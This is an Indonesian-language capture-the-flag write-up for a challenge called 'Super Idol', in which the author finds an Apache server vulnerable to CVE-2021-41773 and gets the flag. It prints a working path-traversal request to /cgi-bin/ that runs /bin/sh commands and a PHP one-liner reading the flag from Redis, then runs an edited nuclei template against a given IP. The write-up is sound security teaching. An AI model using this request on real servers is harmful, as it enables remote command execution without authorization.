Super Idol
Karena bingung harus apalagi yang diiputkan pada form, saya coba melakukan Scan web server apa yang digunakan pada soal tersebut
Jika dilihat versi Apache tersebut rentan RCE https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-41773.yaml
Kemudian ketika saya membaca isi index.php yang harus dilakukan adalah bagaimana memanggil variable $flag, sedangkan imposible jika dilakukan dengan masukan nama pada form.
Sayapun membuat payload bagaimana payload tersebut menjalankan syntax php untuk memanggil / menampilkan isi $flag.
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1Host: {{Hostname}}Content-Type: application/x-www-form-urlencodedecho Content-Type: text/plain; echo; cd /var/www/social_credit/public/ && ls && id && php -r 'require("/var/www/social_credit/vendor/autoload.php");$redis = new Predis\Client("tcp://redis:6379");$flag = $redis->get("flag_social_credit");echo $flag;'Ini template nuclei yang sudah saya edit dengan menyesuaikan payload untuk menampilkan $flag.Dan saya jalankan template tersebut :echo http://159.223.87.165:11337/ | nuclei -t aprce.yaml --debug
Boom! Flag didapatkan
